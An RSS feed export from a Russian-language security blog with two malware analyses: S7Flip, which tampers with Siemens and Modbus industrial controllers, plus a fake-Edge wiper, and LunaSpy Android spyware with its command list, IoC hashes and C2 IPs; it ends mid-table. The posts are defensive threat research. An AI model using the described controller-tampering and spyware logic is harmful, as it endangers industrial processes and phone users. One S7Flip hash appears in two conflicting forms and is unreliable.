<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>malware &#8211; PT ESC</title>
	<atom:link href="/tag/malware/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Wed, 07 Oct 2026 11:55:56 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>malware &#8211; PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Этот ваш Siemens&#8230;</title>
		<link>/this-is-siemens/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Tue, 29 Sep 2026 18:38:28 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d1%8d%d1%82%d0%be%d1%82-%d0%b2%d0%b0%d1%88-siemens/</guid>

					<description><![CDATA[Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его SHA-256: e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2 Наше внимание привлекло сообщение от аккаунта, с которого залили данный сэмпл: Хм, ICS-вредонос, причем…]]></description>
										<content:encoded><![CDATA[<p>Недавно наши коллеги из Центра промышленной экспертизы Позитива обнаружили на MalwareBazaar один любопытный Windows-образец. Вот его SHA-256:</p>
<pre><code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code></pre>
<p>Наше внимание привлекло сообщение от аккаунта, с которого залили данный сэмпл:</p>
<figure class="wp-block-image"><img fetchpriority="high" decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-1024x291.jpg" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="/wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-1024x291.jpg 1024w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-300x85.jpg 300w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28-768x218.jpg 768w, /wp-content/uploads/2026/09/photo_636@29-09-2026_18-38-28.jpg 1280w" alt="" width="1024" height="291" /></figure>
<p>Хм, ICS-вредонос, причем уже с готовым названием S7Flip (то есть нам даже не нужно напрягать свою фантазию, чтобы назвать его)? Звучит интересно! Давайте взглянем, что там внутри.</p>
<p>После закрепления в автозапуске под названием <code>aphp.exe</code> сэмпл начинает собирать адреса устройств в локальной сети — это адреса <code>192.168.*.*</code>, <code>10.*.*.*</code> и <code>172.*.*.*</code>, после чего проверяет на них наличие определенных открытых портов, которые широко используются промышленными устройствами:</p>
<ul>
<li><strong>102</strong> — в основном используют контроллеры Siemens для взаимодействия по протоколу S7Comm или S7Comm+.</li>
<li><strong>502</strong> — стандартный порт протокола Modbus TCP; его могут использовать устройства любых производителей.</li>
<li><strong>44818</strong> — в основном используют контроллеры Allen-Bradley (Rockwell) для взаимодействия по протоколу EtherNet/IP (CIP).</li>
</ul>
<p>Подключение к устройствам Allen-Bradley (Rockwell) фактически не работает. Реализация клиента для EtherNet/IP (CIP) отсутствует: ветка переиспользует Siemens-клиент и пытается подключиться по порту 102 как к контроллеру Siemens. С настоящим Allen-Bradley соединение не установится — воздействие на устройства, открывшие только порт 44818, не оказывается вовсе.</p>
<p>Определив нужные устройства, S7Flip подключается к ним и начинает применять один из деструктивных механизмов (или сразу оба).</p>
<h2>Механизм 1: «randomize» значений</h2>
<p>По S7Comm (порт 102): по очереди обходит блоки DB 1–10; для каждого выбирает случайное смещение 0–99, читает оттуда 4-байтовое целое, прибавляет случайное целое число от −10 до +10 и записывает обратно.</p>
<p>По Modbus TCP (порт 502): выбирает 16-битный holding-регистр по случайному адресу 0–99, читает текущее значение, прибавляет случайное целое число от −10 до +10 и записывает обратно.</p>
<h2>Механизм 2: инверсия битов (findAndModifyInputs)</h2>
<p>По S7Comm (порт 102): последовательно проходит первые 100 байтов в блоках DB 1–10: читает байт, меняет его младший бит на противоположный и записывает обратно.</p>
<p>По Modbus TCP (порт 502): последовательно проходит однобитовые ячейки записи (coils — дискретные выводы, команды, флаги) в диапазоне 0–255: читает бит, меняет на противоположный и записывает обратно.</p>
<p>Каждое изменение пишется в <code>logs.csv</code> рядом с исполняемым файлом и содержит пять колонок — время, тег, вендор, старое и новое значение.</p>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28.jpg" sizes="auto, (max-width: 539px) 100vw, 539px" srcset="/wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28.jpg 539w, /wp-content/uploads/2026/09/photo_637@29-09-2026_18-38-28-300x257.jpg 300w" alt="" width="539" height="461" /></figure>
<p>Помимо данного бинаря, мы также нашли еще один:</p>
<pre><code>88717716e54b35682a28d673764975d439a31ee194c85dfc619a15ea93ab1280</code></pre>
<p>По логике работы он ничем не отличается от рассмотренного ранее образца. Главное отличие заключается в том, что библиотека <code>libmodbus</code>, реализующая работу протокола Modbus, в <code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code> динамически слинкована, а в <code>88717716e54b35682a28d673764975d439a31ee194c85dfc619a15ea93ab1280</code> — статически.</p>
<p>В этот же день с этого же аккаунта <code>jeans</code>, помимо <code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code> (название файла — <code>Edge.exe</code>), был залит еще один бинарь:</p>
<pre><code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code></pre>
<p>При ближайшем рассмотрении он оказался вайпером. При запуске он по-джентльменски спрашивает, не хотите ли вы установить Microsoft Edge:</p>
<figure class="wp-block-image"><img decoding="async" class="attachment-large size-large" src="/wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28.jpg" sizes="auto, (max-width: 807px) 100vw, 807px" srcset="/wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28.jpg 807w, /wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28-300x58.jpg 300w, /wp-content/uploads/2026/09/photo_638@29-09-2026_18-38-28-768x148.jpg 768w" alt="" width="807" height="156" /></figure>
<p>И если вы отказываетесь, то вайпер прекращает свою работу 😅</p>
<p>Но вот если вы соглашаетесь&#8230; то будьте готовы к «непредвиденным обстоятельствам». Вот их список:</p>
<ul>
<li>рекурсивное удаление всего содержимого папки <code>%USERPROFILE%\Desktop</code>;</li>
<li>там же будет создан файл <code>compiled-desktop</code>, который будет содержать ровно <code>1 048 576</code> случайных байт;</li>
<li>ну и, разумеется, файл <code>README.txt</code> с вежливой просьбой перевести биткоины в размере 100 долларов.</li>
</ul>
<p>После всего этого вредонос добавляет себя в автозапуск.</p>
<p>Расшифровка файлов не предусмотрена: содержимое рабочего стола нигде не сохраняется. Это псевдовымогатель-вайпер.</p>
<p>Самое интересное, что в <code>README.txt</code> указан кошелек, на который злоумышленники предлагают переслать деньги: <code>bc1qp6ejw8ptj9l9pkscmlf8fhhkrrjeawgpyjvtq8</code> — это официальный кошелек для донатов проекта <code>Bitcoin.org</code>. Т. е. жулики на самом деле не хотят выкупа? Хм, интересно&#8230; 🤑</p>
<p>Чуть позже <code>jeans</code> залил еще один вариант данного инструмента — <code>f47502628708300840efe2771a3c5e7e9a631205512f0a2ee6382a00a92056e2</code>, причем на этот раз файл называется не <code>Edge.exe</code>, а <code>Edgev5.exe</code>.</p>
<p>Обозначает ли v5 какое-то развитие или дальнейшее улучшение вредоноса? Да, в новой версии автор добавил симметричное шифрование файлов с помощью AES-256-GCM, а также расширил количество папок для шифрования: теперь помимо Desktop шифрованию подлежат Downloads и Documents. Правда, есть один нюанс&#8230; ключ для расшифрования данных находится в файле <code>master_key.dat</code>, да и биткоин-кошелек такой же, как и в более ранней версии вайпера.</p>
<p>По всей видимости, автор вредоноса активно развивает и тестирует свой инструмент. Возможно, в будущем он начнет активно применять его в «боевом» виде.</p>
<h2>А какая связь между S7Flip и вайперами? 🧐</h2>
<p>В ходе чтения данного поста у вас, возможно, возник вопрос: «а как связаны S7Flip и вайпер между собой?» И на самом деле определенные совпадения есть:</p>
<ul>
<li>все бинари были собраны с помощью тулчейна GCC 16.2.0;</li>
<li>timestamp сборки PE-файлов <code>88717716e54b35682a28d673769475d439a31ee194c85dfc619a15ea93ab1280</code> (S7Flip) и <code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code> (<code>Edge.exe</code>) совпадает с точностью до дня — 2026-09-13;</li>
<li>общий аккаунт, с которого файлы были залиты на MalwareBazaar, — <code>jeans</code>.</li>
</ul>
<p>Достаточно ли этих данных, чтобы утверждать, что S7Flip и вайперы разработаны одним и тем же автором? Нет, определенные сомнения все равно остаются, но некоторая взаимосвязь все же есть.</p>
<h2>IoCs</h2>
<table>
<tbody>
<tr>
<th>SHA-256</th>
<th>Имя</th>
<th style="text-align: center;">PT Fusion</th>
</tr>
<tr>
<td><code>88717716e54b35682a28d673769475d439a31ee194c85dfc619a15ea93ab1280</code></td>
<td>S7Flip</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/c4cb038a-718a-4509-a22a-151d0ebf310a" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>e014dadf6d93b312b93e2fc857791c241692da4015da7a24a4d42a946551add2</code></td>
<td>S7Flip</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/3ca9e76f-e2d8-4da7-85ed-4c950bb25d26" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>2c57c1a39933514c63b5a7b585f5948ead04b65e4df96fb595ccda84208c4aa0</code></td>
<td>Edge.exe (ver 1)</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/ebdd1e1e-02e6-4b42-adf3-d7ca2356cde2" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
<tr>
<td><code>f47502628708300840efe2771a3c5e7e9a631205512f0a2ee6382a00a92056e2</code></td>
<td>Edgev5.exe</td>
<td style="text-align: center;"><a href="https://fusion.ptsecurity.com/shared/iocs/e50f6bc0-5e19-4ea5-8460-5840e32ec2ec" target="_blank" rel="noopener">Открыть ↗</a></td>
</tr>
</tbody>
</table>
<p><span class="hashtag">#malware</span> <span class="hashtag">#win</span> <span class="hashtag">#ioc</span><br />
<a href="https://t.me/ptescalator" target="_blank" rel="noopener">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Анти-антивирус</title>
		<link>/anti-antivirus/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Mon, 28 Sep 2026 15:29:43 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%b0%d0%bd%d1%82%d0%b8-%d0%b0%d0%bd%d1%82%d0%b8%d0%b2%d0%b8%d1%80%d1%83%d1%81/</guid>

					<description><![CDATA[Недавно нам на глаза попалась APK-шка с интригующим и внушающим доверие названием «Антивирус ФСБ.apk». Установив его, мы обнаружили, что при запуске пользователя встречает интерфейс известной программы для управления звонками на Android —…]]></description>
										<content:encoded><![CDATA[<p>Недавно нам на глаза попалась APK-шка с интригующим и внушающим доверие названием «<code>Антивирус ФСБ.apk</code>».</p>
<p>Установив его, мы обнаружили, что при запуске пользователя встречает интерфейс известной программы для управления звонками на <code>Android — Right Dialer</code> от разработчика <a href="https://github.com/Goodwy/Dialer" rel="noopener" target="_blank">Goodwy</a>.</p>
<p>Вероятнее всего, выбор злоумышленников пал именно на это приложение, так как оно запрашивает большое количество разрешений: работа с контактами, выполнение звонков, доступ к камере и так далее.</p>
<figure class="wp-block-image"><img width="1011" height="1012" src="/wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43.jpg 1011w, /wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43-300x300.jpg 300w, /wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43-150x150.jpg 150w, /wp-content/uploads/2026/09/photo_623@28-09-2026_15-29-43-768x769.jpg 768w" sizes="auto, (max-width: 1011px) 100vw, 1011px" /><figcaption>Фрагмент AndroidManifest приложения Goodwy</figcaption></figure>
<figure class="wp-block-image"><img width="1024" height="721" src="/wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-1024x721.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-1024x721.jpg 1024w, /wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-300x211.jpg 300w, /wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-768x541.jpg 768w, /wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43-1536x1082.jpg 1536w, /wp-content/uploads/2026/09/photo_624@28-09-2026_15-29-43.jpg 1706w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Запрашиваемые разрешения</figcaption></figure>
<p>Открыв <code>AndroidManifest.xml</code>, нетрудно увидеть, что основной пакет —<code> com.syscore.toolsuite</code>, а не <code>com.goodwy.dialer</code>. Это означает, что код Goodwy был встроен в чужое приложение — уже известный Android-шпион <code>LunaSpy</code>, более ранняя версия которого была <a href="https://www.f6.ru/blog/lunaspy-android-research" rel="noopener" target="_blank">рассмотрена в статье</a>.</p>
<figure class="wp-block-image"><img width="1024" height="691" src="/wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43-1024x691.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43-1024x691.jpg 1024w, /wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43-300x202.jpg 300w, /wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43-768x518.jpg 768w, /wp-content/uploads/2026/09/photo_625@28-09-2026_15-29-43.jpg 1061w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Goodwy в activity-alias</figcaption></figure>
<p>Перед статическим исследованием образца мы запустили его в песочнице <code>PT Sandbox</code>, чтобы получить общее представление о работе ВПО:</p>
<figure class="wp-block-image"><img width="1024" height="586" src="/wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43-1024x586.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43-1024x586.jpg 1024w, /wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43-300x172.jpg 300w, /wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43-768x440.jpg 768w, /wp-content/uploads/2026/09/photo_626@28-09-2026_15-29-43.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Запуск приложения в PT Sandbox</figcaption></figure>
<p><strong>Ключевые наблюдения из динамического анализа:</strong></p>
<ul>
<li>Коммуникация с управляющими серверами</li>
<li>Получение привилегий</li>
<li>Создание скрытых файлов</li>
</ul>
<p>Злоумышленники расширили свой шпион рядом новых команд (как говорится, если используешь <code>Accessibility Service</code>, то используй его по полной):</p>
<ul>
<li><code>GET_CALL_RECORDINGS</code> — отправляет на управляющий сервер список имен файлов, перебирая файлы с расширением <code>.wav</code>, чей размер больше 44 байтов (размер заголовка WAV), в директории <code>getFilesDir()/call_recordings</code></li>
<li><code>DOWNLOAD_CALL_RECORDING</code> — отправляет на управляющий сервер запись звонка с указанным id, закодированную в Base64</li>
<li><code>SET_REDIRECT_RULES</code>, <code>GET_REDIRECT_RULES</code> — подмена исходящих звонков согласно полученным с управляющего сервера правилам</li>
<li>Добавилось больше команд для управления логированием устройства: <code>REQUEST_LOGS</code>, <code>CLEAR_LOGS</code>, <code>LOGGING_ENABLE</code>, <code>LOGGING_DISABLE</code></li>
<li><code>RESET_SOFT</code>, <code>RESET_DEEP</code>, <code>RESET_GLOBAL</code> — перезапуск части или всех вспомогательных сервисов шпиона</li>
<li><code>RESET_REBOOT</code> — имитация перезагрузки устройства (при получении — останавливает свои сервисы, отменяет задачи <code>WorkManager</code>, имитирует задержку при загрузке системы (8 секунд), после чего перезапускает сервисы)</li>
<li><code>GET_SCREEN_TREE</code> — получить параметры текущего экрана: width, height, объекты на экране, их позиции, текст и свойства</li>
<li>Сложные команды с параметрами для управления устройством (имитация действий пользователя): <code>PERFORM_TAP</code> (выполнить нажатие на экран), <code>PERFORM_SWIPE</code> (провести по экрану), <code>PERFORM_INPUT_TEXT</code> (выполнить вставку текста), <code>PERFORM_PATH_GESTURE</code> (выполнить жест по заданным позициям с определенной длительностью нажатия), <code>PERFORM_PATTERN_UNLOCK</code> (команда похожа на <code>PERFORM_PATH_GESTURE</code>, однако предназначена для адаптивных паттернов, например, разблокировка по рисунку), <code>PERFORM_BACK</code> (выполнить действие «назад»), <code>PERFORM_HOME</code> (выполнить переход на домашний экран), <code>PERFORM_RECENTS</code> (просмотреть список недавних приложений) — команды, активно использующие функции <code>PerformGlobalAction</code> и механизм <code>GestureDescription</code></li>
<li><code>REVIVE_PERMISSIONS</code> — показывает пользователю уведомление поверх всех окон с целью получения прав <code>android.permission.CAMERA</code> и <code>android.permission.RECORD_AUDIO</code></li>
<li><code>DISABLE_PLAY_PROTECT</code> — отключить глобальную настройку в Android (<code>Settings.Global.PACKAGE_VERIFIER_ENABLE</code>), которая управляет проверкой приложений перед их установкой</li>
</ul>
<p>Кроме того, ряд строк (например, IP-адреса, названия некоторых команд) шифруется алгоритмом XOR для усложнения анализа.</p>
<figure class="wp-block-image"><img width="923" height="361" src="/wp-content/uploads/2026/09/photo_627@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_627@28-09-2026_15-29-43.jpg 923w, /wp-content/uploads/2026/09/photo_627@28-09-2026_15-29-43-300x117.jpg 300w, /wp-content/uploads/2026/09/photo_627@28-09-2026_15-29-43-768x300.jpg 768w" sizes="auto, (max-width: 923px) 100vw, 923px" /><figcaption>Шифрование строк</figcaption></figure>
<figure class="wp-block-image"><img width="969" height="651" src="/wp-content/uploads/2026/09/photo_628@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_628@28-09-2026_15-29-43.jpg 969w, /wp-content/uploads/2026/09/photo_628@28-09-2026_15-29-43-300x202.jpg 300w, /wp-content/uploads/2026/09/photo_628@28-09-2026_15-29-43-768x516.jpg 768w" sizes="auto, (max-width: 969px) 100vw, 969px" /><figcaption>Реализация команды DOWNLOAD_CALL_RECORDING</figcaption></figure>
<figure class="wp-block-image"><img width="805" height="182" src="/wp-content/uploads/2026/09/photo_629@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_629@28-09-2026_15-29-43.jpg 805w, /wp-content/uploads/2026/09/photo_629@28-09-2026_15-29-43-300x68.jpg 300w, /wp-content/uploads/2026/09/photo_629@28-09-2026_15-29-43-768x174.jpg 768w" sizes="auto, (max-width: 805px) 100vw, 805px" /><figcaption>Реализация команды DISABLE_PLAY_PROTECT</figcaption></figure>
<figure class="wp-block-image"><img width="1024" height="460" src="/wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43-1024x460.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43-1024x460.jpg 1024w, /wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43-300x135.jpg 300w, /wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43-768x345.jpg 768w, /wp-content/uploads/2026/09/photo_630@28-09-2026_15-29-43.jpg 1059w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Реализация команды REVIVE_PERMISSIONS</figcaption></figure>
<figure class="wp-block-image"><img width="752" height="488" src="/wp-content/uploads/2026/09/photo_631@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_631@28-09-2026_15-29-43.jpg 752w, /wp-content/uploads/2026/09/photo_631@28-09-2026_15-29-43-300x195.jpg 300w" sizes="auto, (max-width: 752px) 100vw, 752px" /><figcaption>Реализация команды GET_SCREEN_TREE</figcaption></figure>
<figure class="wp-block-image"><img width="825" height="684" src="/wp-content/uploads/2026/09/photo_632@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_632@28-09-2026_15-29-43.jpg 825w, /wp-content/uploads/2026/09/photo_632@28-09-2026_15-29-43-300x249.jpg 300w, /wp-content/uploads/2026/09/photo_632@28-09-2026_15-29-43-768x637.jpg 768w" sizes="auto, (max-width: 825px) 100vw, 825px" /><figcaption>Реализация команды RESET_REBOOT</figcaption></figure>
<figure class="wp-block-image"><img width="747" height="287" src="/wp-content/uploads/2026/09/photo_633@28-09-2026_15-29-43.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_633@28-09-2026_15-29-43.jpg 747w, /wp-content/uploads/2026/09/photo_633@28-09-2026_15-29-43-300x115.jpg 300w" sizes="auto, (max-width: 747px) 100vw, 747px" /><figcaption>Пример реализации PERFORM_SWIPE</figcaption></figure>
<p>Вредоносное ПО демонстрирует устойчивую тенденцию к развитию: от простого шпионажа к комплексному контролю устройства с элементами антиобнаружения, масштабируемой инфраструктурой и усовершенствованными методами социальной инженерии. Это требует от пользователей и специалистов по безопасности постоянного повышения уровня защиты и бдительности.</p>
<h2>Меры предосторожности:</h2>
<ul>
<li>Не стоит скачивать приложения с открытым исходным кодом из неизвестных источников, так как их легко видоизменить. Лучше скачивать их из <a href="https://play.google.com/store/apps/details?id=com.goodwy.dialer" rel="noopener" target="_blank">Google Play</a> или брать последний релиз со <a href="https://github.com/Goodwy/Dialer" rel="noopener" target="_blank">страницы разработчика</a>.</li>
<li>Не предоставляйте приложениям разрешения, которые им не потребуются (особенно разрешения <code>Accessibility Service</code>).</li>
<li>При подозрении на заражение ВПО проверьте список установленных приложений или воспользуйтесь средствами для отслеживания активности.</li>
</ul>
<p><strong>Файловые индикаторы</strong></p>
<table>
<tr>
<th style="text-align:center">Имя</th>
<th style="text-align:center">Хеш</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td style="text-align:center">Антивирус ФСБ.apk</td>
<td style="text-align:center"><code>5c2cbb7cad7d8d4e6dc36c9a35a1c589</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/891fca3b-4147-44ff-b3e6-971328108123" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<p><strong>Сетевые индикаторы</strong></p>
<table>
<tr>
<th style="text-align:center">IP</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td style="text-align:center"><code>2.56.179.190</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2cafeb3e-2bcc-4b8f-96ac-cb9d502f3091" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>2.59.183.215</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/bc1a83d2-3b29-4bb3-a4bb-be0f1227dd53" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>5.45.93.167</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0e1cb322-c983-4a00-9157-4279a65c4caa" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>5.101.88.37</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/84ef357d-6ab2-449c-b4a9-52e28f3958ba" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>5.101.88.39</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5f3a4463-2398-46b3-805c-b7e2384dadb2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>5.101.88.41</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f786dee-d04a-4f99-8a18-d7dc3663ec48" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>31.172.75.46</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8a4623e7-da82-47f0-84da-d2c8fdc693" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>31.192.237.132</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3046b229-3bb6-4fa4-8bcc-615cfe842acf" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>31.214.157.53</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/d15a7260-f2e0-4dc8-badb-20bd71c5f257" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>37.10.71.100</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/a7c5e6cc-3fac-458f-94d3-1002bee01cf0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>38.180.3.187</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b262c837-2070-42ff-9ff3-695432a93f1c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>38.180.87.241</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f2da26ab-1e0e-46f3-be4d-61e570e873ac" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>38.180.144.105</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b1bd9099-a2d3-4c76-90f1-9a39c7f0bbad" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>38.244.208.134</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/61bb9725-dd6a-4b13-a022-e2e1fd026e93" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.8.145.60</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1e254ac0-3c24-42a2-b325-9fbeccf4fe89" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.8.228.204</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/32c2408c-13a5-4255-91e3-24d3cb362a13" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.8.230.157</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/174c3081-6759-447a-a606-f1fb850373d8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.10.246.197</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c9e459f9-8fdd-4642-8316-5a2086624eec" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.12.111.27</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/0c7beee1-1f44-480e-9500-139294619645" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.15.126.252</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b12144ad-e99b-4225-8a46-61b227a138fd" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.67.35.58</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e20adc9d-3287-404b-82ac-fdd954fb45b9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.67.231.139</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8d01ff09-00b5-44cf-85fa-2671f8cd9903" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.67.231.215</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/922ebedb-efcd-4503-adcd-37f8aa5e4f17" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.82.255.173</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fbc699b5-4b94-4514-91e4-4fa23a3bcc86" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td style="text-align:center"><code>45.85.93.206</code></td>
